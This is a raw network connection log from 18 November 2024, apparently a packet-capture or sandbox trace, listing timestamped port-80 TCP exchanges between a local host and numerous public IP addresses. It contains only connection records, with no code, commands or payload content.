                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.363682985 CET805012318.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.363771915 CET5012380192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.370718002 CET5012480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.375756979 CET805012418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.375849962 CET5012480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.375941038 CET5012480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.375955105 CET5012480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.380970001 CET805012418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.381005049 CET805012418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.537858009 CET5012580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.542933941 CET805012518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.543034077 CET5012580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.543137074 CET5012580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.543159008 CET5012580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.548077106 CET805012518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:45.548101902 CET805012518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.215121984 CET805012418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.216701031 CET5012480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.222311020 CET805012418.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.222424030 CET5012480192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.230093002 CET5012680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.235997915 CET805012644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.236092091 CET5012680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.236325979 CET5012680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.236341000 CET5012680192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.237864971 CET805012518.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.238028049 CET5012580192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.241318941 CET805012644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:46.241349936 CET805012644.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:48.829359055 CET805013318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.295150042 CET805013244.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.299876928 CET5013280192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.307370901 CET805013244.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.307436943 CET5013280192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.335532904 CET5013480192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.340477943 CET805013434.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.340629101 CET5013480192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.371335983 CET5013480192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.371480942 CET5013480192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.376535892 CET805013434.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:49.376575947 CET805013434.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.171160936 CET805013434.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.215348005 CET5013480192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.290076971 CET805013318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.290277004 CET805013434.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.290577888 CET5013480192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.340188026 CET5013380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.447269917 CET5013480192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.448436022 CET5013380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.452166080 CET805013434.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.453799963 CET805013318.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.453845024 CET5013380192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.490421057 CET5013580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.491611004 CET5013680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.495634079 CET805013534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.495716095 CET5013580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.497024059 CET5013580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.497045994 CET5013580192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.497090101 CET805013634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.497143030 CET5013680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.497805119 CET5013680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.497828960 CET5013680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.507129908 CET805013534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.507143021 CET805013534.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.508152962 CET805013634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:50.508163929 CET805013634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.332694054 CET805013634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.332869053 CET5013680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.338279963 CET805013634.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.338330984 CET5013680192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.348589897 CET5013780192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.353549957 CET805013734.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.353679895 CET5013780192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.353915930 CET5013780192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.353915930 CET5013780192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.358748913 CET805013734.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.358758926 CET805013734.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.451334953 CET5013780192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.453083038 CET5013880192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.458067894 CET805013834.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.459824085 CET5013880192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.459973097 CET5013880192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.459988117 CET5013880192.168.2.1034.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.465204000 CET805013834.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:51.465218067 CET805013834.246.200.160192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:54.878772020 CET805014513.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.455624104 CET5014580192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.475100994 CET5014680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.480722904 CET805014613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.480818033 CET5014680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.492233992 CET5014680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.492249012 CET5014680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.497386932 CET805014613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.497404099 CET805014613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.981547117 CET805014418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.992321968 CET5014480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.998111963 CET805014418.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:55.998167992 CET5014480192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.009902000 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.009916067 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.015166998 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.015178919 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.164326906 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.177228928 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.180711985 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.183346987 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.185586929 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.325150967 CET8050059208.100.26.245192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.338661909 CET5014780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.344541073 CET805014744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.344681978 CET5014780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.344681978 CET5014780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.344717979 CET5014780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.349931955 CET805014744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.350023985 CET805014744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.371470928 CET5005980192.168.2.10208.100.26.245
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.924932957 CET805014613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:56.980844021 CET5014680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.005778074 CET5014680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.007216930 CET805014744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.008411884 CET5014780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.013520002 CET805014613.251.16.150192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.013717890 CET5014680192.168.2.1013.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.013748884 CET805014744.221.84.105192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.013920069 CET5014780192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.374914885 CET5014880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.376118898 CET5014980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.379882097 CET805014818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.379957914 CET5014880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.381083012 CET805014934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.381160975 CET5014980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.389431953 CET5014880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.389458895 CET5014880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.394412994 CET805014818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.394440889 CET805014818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.395118952 CET5014980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.395137072 CET5014980192.168.2.1034.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.399956942 CET805014934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:57.400355101 CET805014934.211.97.45192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.052541971 CET805014818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:59:58.052714109 CET5014880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.000791073 CET5015580192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.032784939 CET5015780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.037844896 CET805015754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.037926912 CET5015780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.038037062 CET5015780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.038038015 CET5015780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.043358088 CET805015754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.043370962 CET805015754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.745206118 CET805015647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.747334003 CET5015680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.752661943 CET805015647.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.753761053 CET5015680192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.804932117 CET5015880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.809957981 CET805015818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.810144901 CET5015880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.810441971 CET5015880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.810523987 CET5015880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.815604925 CET805015818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.815625906 CET805015818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.878035069 CET805015754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.882664919 CET5015780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.888051987 CET805015754.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:01.888314962 CET5015780192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.092354059 CET5015980192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.097270966 CET805015918.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.097353935 CET5015980192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.097457886 CET5015980192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.097457886 CET5015980192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.102422953 CET805015918.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.102436066 CET805015918.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.867441893 CET805015818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.904633045 CET805015818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.905817032 CET5015880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.940538883 CET805015918.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:02.980859995 CET5015980192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.047686100 CET5015880192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.048537970 CET5015980192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.053792953 CET805015818.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.054778099 CET805015918.246.231.120192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.054842949 CET5015980192.168.2.1018.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.068500042 CET5016080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.071348906 CET5016180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.075222969 CET805016054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.075325966 CET5016080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.077940941 CET805016118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.078005075 CET5016180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.082138062 CET5016080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.082210064 CET5016080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.082402945 CET5016180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.082562923 CET5016180192.168.2.1018.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.089046001 CET805016054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.089068890 CET805016054.244.188.177192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.091180086 CET805016118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.091197968 CET805016118.208.156.248192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:03.449928045 CET5016080192.168.2.1054.244.188.177
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.672624111 CET5016880192.168.2.1044.221.84.105
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.683201075 CET5016980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.688142061 CET805016918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.688216925 CET5016980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.688395023 CET5016980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.688395023 CET5016980192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.693236113 CET805016918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.693248987 CET805016918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.981956959 CET805016718.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.982151985 CET5016780192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.987440109 CET805016718.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.987895966 CET5016780192.168.2.1018.141.10.107
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:06.997688055 CET5017080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.003027916 CET805017047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.003199100 CET5017080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.003319979 CET5017080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.003319979 CET5017080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.008280993 CET805017047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.008299112 CET805017047.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.503711939 CET5017080192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.505589008 CET5017180192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.510639906 CET805017147.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.510719061 CET5017180192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.517278910 CET5017180192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.517304897 CET5017180192.168.2.1047.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.522135973 CET805017147.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:07.522176027 CET805017147.129.31.212192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.130213976 CET805016918.141.10.107192.168.2.10
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 10:00:08.130423069 CET5016980192.168.2.1018.141.10.107
